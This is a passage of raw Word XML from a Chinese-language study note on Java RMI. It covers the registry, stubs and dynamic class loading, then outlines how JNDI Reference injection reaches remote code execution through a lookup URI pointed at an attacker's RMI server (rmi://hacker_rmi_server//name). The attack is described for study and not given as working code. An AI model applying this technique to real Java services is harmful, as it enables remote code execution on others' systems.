    <w:p w14:paraId="36299202" w14:textId="00A3D72B" w:rsidR="00BC3EA6" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Stub的获取方式有很多，常见的方法是调用某个远程服务上的方法，向远程服务获取存根。但是调用远程方法又必须先有远程对象的Stub，所以这里有个死循环问题。JDK提供了一个RMI注册表（RMIRegistry）来解决这个问题。RMIRegistry也是一个远程对象，默认监听在传说中的1099端口上，可以使用代码启动RMIRegistry，也可以使用rmiregistry命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B4295" w14:textId="59561922" w:rsidR="001F689D" w:rsidRDefault="001F689D" w:rsidP="001F689D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="001F689D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要注册远程对象，需要</w:t>
      </w:r>
      <w:r w:rsidRPr="001F689D">
        <w:t>RMI URL和一个远程对象的引用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3FA8DB" w14:textId="77777777" w:rsidR="001F689D" w:rsidRPr="001F689D" w:rsidRDefault="001F689D" w:rsidP="001F689D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>IHello rhello = </w:t>
      </w:r>
      <w:r w:rsidRPr="001F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="D01D33"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="001F689D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1F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>HelloImpl();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3DA1F1" w14:textId="77777777" w:rsidR="001F689D" w:rsidRPr="001F689D" w:rsidRDefault="001F689D" w:rsidP="001F689D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>LocateRegistry.createRegistry(</w:t>
      </w:r>
      <w:r w:rsidRPr="001F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="009900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1099</w:t>
      </w:r>
      <w:r w:rsidRPr="001F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A5FDB" w14:textId="77777777" w:rsidR="001F689D" w:rsidRPr="001F689D" w:rsidRDefault="001F689D" w:rsidP="001F689D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Naming.bind(</w:t>
      </w:r>
      <w:r w:rsidRPr="001F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="001F689D">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
            <w:color w:val="E3E658"/>
            <w:kern w:val="0"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>rmi://0.0.0.0:1099/hello</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="001F689D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>, rhello);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC7362C" w14:textId="7C618AF0" w:rsidR="00BC3EA6" w:rsidRPr="001F689D" w:rsidRDefault="00BC3EA6" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="451C21B5" w14:textId="365F6887" w:rsidR="001F689D" w:rsidRDefault="00765458" w:rsidP="00765458">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00765458">
        <w:t>LocateRegistry.getRegistry()会使用给定的主机和端口等信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>本地创建一个Stub对象作为Registry远程对象的代理</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:t>，从而启动整个远程调用逻辑。服务端应用程序可以向RMI注册表中注册远程对象，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>客户端向RMI注册表查询某个远程对象名称，来获取该远程对象的Stub</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA4CF2B" w14:textId="77777777" w:rsidR="00765458" w:rsidRPr="00765458" w:rsidRDefault="00765458" w:rsidP="00765458">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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65458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Registry registry = LocateRegistry.getRegistry(</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"kingx_kali_host"</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="009900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1099</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC8AD3" w14:textId="77777777" w:rsidR="00765458" w:rsidRPr="00765458" w:rsidRDefault="00765458" w:rsidP="00765458">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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65458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>IHello rhello = (IHello) registry.lookup(</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"hello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06569134" w14:textId="77777777" w:rsidR="00765458" w:rsidRPr="00765458" w:rsidRDefault="00765458" w:rsidP="00765458">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="121212"/>
        <w:spacing w:line="264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65458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>rhello.sayHello(</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="E3E658"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>"test"</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724EAAB" w14:textId="77777777" w:rsidR="00765458" w:rsidRDefault="00765458" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="0DCCF9FF" w14:textId="2ABCC6D7" w:rsidR="001F689D" w:rsidRDefault="00765458" w:rsidP="00BC3EA6">
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:t>RMI Registry之后，RMI的调用关系是这样的：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1599D5C5" w14:textId="39287BAA" w:rsidR="00765458" w:rsidRDefault="00003EE0" w:rsidP="00BC3EA6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70F2DEC5" wp14:editId="41F04233">
            <wp:extent cx="4712970" cy="32416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A2342" w14:textId="2CFBBAB7" w:rsidR="00765458" w:rsidRDefault="00765458" w:rsidP="00BC3EA6">
      <w:r w:rsidRPr="00765458">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>所以其实从客户端角度看，服务端应用是有两个端口的，一个是</w:t>
      </w:r>
      <w:r w:rsidRPr="00765458">
        <w:t>RMI Registry端口（默认为1099），另一个是远程对象的通信端口（随机分配的）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D74E209" w14:textId="5C37351F" w:rsidR="00765458" w:rsidRDefault="00765458" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="01A92A16" w14:textId="7075678F" w:rsidR="00B532B9" w:rsidRDefault="00B532B9" w:rsidP="00B532B9">
      <w:r w:rsidRPr="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>例1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，server端存</w:t>
      </w:r>
      <w:r w:rsidR="00235734">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接绑定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程对象的</w:t>
      </w:r>
      <w:r w:rsidR="00BE044B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rmi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0303C" w14:textId="77777777" w:rsidR="00B532B9" w:rsidRDefault="00B532B9" w:rsidP="00B532B9">
      <w:r w:rsidRPr="00B532B9">
        <w:t>https://blog.51cto.com/lavasoft/91679</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDBF5A" w14:textId="3DA2B869" w:rsidR="00B532B9" w:rsidRPr="00B532B9" w:rsidRDefault="00B532B9" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="26897062" w14:textId="77777777" w:rsidR="00B532B9" w:rsidRDefault="00B532B9" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="07F73E7E" w14:textId="4E8E3C9B" w:rsidR="00003EE0" w:rsidRPr="00003EE0" w:rsidRDefault="00003EE0" w:rsidP="00003EE0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00003EE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 动态加载类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB4A7DE" w14:textId="15E02C0B" w:rsidR="00003EE0" w:rsidRDefault="00003EE0" w:rsidP="00003EE0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RMI核心特点之一就是动态类加载，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果当前JVM中没有某个类的定义，它可以从远程URL去下载这个类的class</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84283">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>动态加载的对象class文件可以使用Web服务的方式进行托管</w:t>
      </w:r>
      <w:r>
        <w:t>。这可以动态的扩展远程应用的功能，RMI注册表上可以动态的加载绑定多个RMI应用。</w:t>
      </w:r>
      <w:r w:rsidRPr="000E42E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>对于客户端而言，服务端返回值也可能是一些子类的对象实例</w:t>
      </w:r>
      <w:r>
        <w:t>，而客户端并没有这些子类的class文件，如果需要客户端正确调用这些子类中被重写的方法，则同样需要有运行时动态加载额外类的能力。客户端使用了与RMI注册表相同的机制。</w:t>
      </w:r>
      <w:r w:rsidRPr="000E42E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RMI服务端将URL传递给客户端，客户</w:t>
      </w:r>
      <w:r w:rsidRPr="000E42E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>端通过</w:t>
      </w:r>
      <w:r w:rsidRPr="000E42E0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP请求下载这些类。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54066A00" w14:textId="77777777" w:rsidR="000E42E0" w:rsidRPr="000E42E0" w:rsidRDefault="000E42E0" w:rsidP="00003EE0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F65B155" w14:textId="77777777" w:rsidR="000E42E0" w:rsidRDefault="000E42E0" w:rsidP="000E42E0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个概念比较</w:t>
      </w:r>
      <w:r w:rsidRPr="000E42E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>重要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>JNDI注入的利用方法中也借助了动态加载类的思路。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5101FE" w14:textId="77777777" w:rsidR="000E42E0" w:rsidRDefault="000E42E0" w:rsidP="000E42E0"/>
    <w:p w14:paraId="413169AD" w14:textId="5DC62757" w:rsidR="00003EE0" w:rsidRDefault="000E42E0" w:rsidP="000E42E0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里涉及到的角色：客户端、</w:t>
      </w:r>
      <w:r>
        <w:t>RMI注册表、远程对象服务器、托管class文件的Web服务器可以分别位于不同的主机上：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFA3039" w14:textId="35EFAD7D" w:rsidR="00003EE0" w:rsidRDefault="000E42E0" w:rsidP="00BC3EA6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D510328" wp14:editId="26B33C90">
            <wp:extent cx="5274310" cy="4368800"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="动态加载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动态加载类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C53EC" w14:textId="137C4686" w:rsidR="000E42E0" w:rsidRDefault="000E42E0" w:rsidP="00BC3EA6"/>
    <w:p w14:paraId="21AA4897" w14:textId="08CB8053" w:rsidR="000E42E0" w:rsidRDefault="00B532B9" w:rsidP="00BC3EA6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B532B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B532B9">
        <w:t>JNDI References进行注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C2850" w14:textId="62C8BFC6" w:rsidR="00B532B9" w:rsidRDefault="00B532B9" w:rsidP="00B532B9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00B532B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B532B9">
        <w:t>JNDI服务中，RMI服务端除了直接绑定远程对象之外</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（上述的例1）</w:t>
      </w:r>
      <w:r w:rsidRPr="00B532B9">
        <w:t>，还可以通过References类来绑定一个外部的远程对象（当前名称目录系统之外的对象）。绑定了Reference之后，服务端会先通过Referenceable.getReference()获取绑定对象的引用，并且在目录中保存。当客户端在lookup()查找这个远程对象时，客户端会获取相应的object factory，最终通过factory类将reference转换为具体的对象实例。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71FD56" w14:textId="77777777" w:rsidR="00883A86" w:rsidRDefault="00883A86" w:rsidP="00883A86"/>
    <w:p w14:paraId="3877C165" w14:textId="29B52C11" w:rsidR="00883A86" w:rsidRDefault="00883A86" w:rsidP="00883A86">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整个利用流程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654300F4" w14:textId="17DE047E" w:rsidR="00883A86" w:rsidRDefault="00D50617" w:rsidP="00883A86">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标代码中调用了</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>InitialContext</w:t>
      </w:r>
      <w:r w:rsidR="00883A86" w:rsidRPr="00883A86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.lookup(URI)</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>，且URI为用户可控；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688727F" w14:textId="4A45B327" w:rsidR="00883A86" w:rsidRDefault="00D50617" w:rsidP="00883A86">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者控制</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>URI参数为恶意的RMI服务地址，如：rmi://hacker_rmi_server//name；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D5484" w14:textId="08B743D4" w:rsidR="00883A86" w:rsidRDefault="00D50617" w:rsidP="00883A86">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="00883A86" w:rsidRPr="00660BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RMI服务器向目标返回一个Reference对象</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>，Reference对象中指定某个精心构造的Factory类；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC038BF" w14:textId="33557EC2" w:rsidR="00883A86" w:rsidRDefault="00D50617" w:rsidP="00883A86">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标在进行</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>lookup()操作时，会</w:t>
      </w:r>
      <w:r w:rsidR="00883A86" w:rsidRPr="00660BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>动态加载并实例化Factory类</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>，接着调用factory.getObjectInstance()获取外部远程对象实例；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48753534" w14:textId="219592AF" w:rsidR="00B532B9" w:rsidRPr="001F689D" w:rsidRDefault="00D50617" w:rsidP="00883A86">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00883A86" w:rsidRPr="00660BC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>攻击者可以在</w:t>
      </w:r>
      <w:r w:rsidR="00883A86" w:rsidRPr="00660BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Factory类文件的构造方法、静态代码块、getObjectInstance()方法等处写入恶意代码，达到RCE的效果</w:t>
      </w:r>
      <w:r w:rsidR="00883A86">
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B4793" w14:textId="4DEAF886" w:rsidR="00F9344B" w:rsidRDefault="00F9344B"/>
    <w:p w14:paraId="4A4D1E7F" w14:textId="14CC1B6F" w:rsidR="00056DFD" w:rsidRDefault="00056DFD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
